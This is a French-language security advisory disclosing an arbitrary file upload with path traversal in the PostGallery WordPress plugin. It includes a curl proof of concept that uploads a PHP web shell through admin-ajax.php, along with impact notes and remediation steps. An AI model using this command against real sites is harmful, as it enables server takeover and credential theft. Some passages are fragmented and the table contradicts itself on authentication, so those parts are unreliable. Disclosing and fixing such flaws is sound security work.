
Divulgation pour CVE-2025-13543
Divulgation de CVE-2025-13543
Ce dépôt divulgue une vulnérabilité découverte dans PostGallery <= 1.12.5, plugin WordPress développé par rtowebsites.
| CVE ID | Type | Composant | Impact |
|---|---|---|---|
| CVE-2025-13543 | Téléversement arbitraire de fichiers (authentifié, Subscriber+) | lib/ajax-actions/imageUpload.php admin/PostGalleryUploader.php | Un attaquant non authentifié peut téléverser un fichier arbitraire |
postgalleryAjaxUpload) et backend PostGalleryUploadercurl -k -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
-H "Cookie: wordpress_logged_in_<hash>=<your_cookie>" \
-F "action=postgalleryAjaxUpload" \
-F "postid=1" \
-F "uploadFolder=../../../" \
-F "name=shell.php" \
-F "[email protected];type=application/x-php"
wp-config.php et des identifiants de base de données, le déploiement de portes dérobées persistantes et la création de comptes administrateur malveillants.lib/ajax-actions/imageUpload.php, appliquez une autorisation appropriée (par exemple, exigez current_user_can('upload_files')) et validez un nonce cryptographique avant de traiter les téléversements.admin/PostGalleryUploader.php, limitez strictement uploadFolder à un sous-répertoire connu de wp-content/uploads/gallery, rejetez toute valeur contenant ../ ou des chemins absolus, et normalisez les chemins avant utilisation.wp_handle_upload() / wp_check_filetype_and_ext() et limitez les téléversements à une liste blanche de types de médias non exécutables, en bloquant explicitement .php et toute autre extension exécutable dans les répertoires accessibles depuis le web.Penser qu'une vulnérabilité digne d'un CTF puisse exister... Le téléversement arbitraire de fichiers est déjà catastrophique à lui seul, alors y ajouter une traversée de répertoire, c'est le désespoir. Reproduire la vulnérabilité a été très amusant.
Nom : MooseLove
Rôle : chercheur en sécurité indépendant / chasseur de bugs
Contact : disponible sur demande
Cet avis est publié à des fins de sensibilisation à la sécurité publique. Libre de le partager avec mention de la source.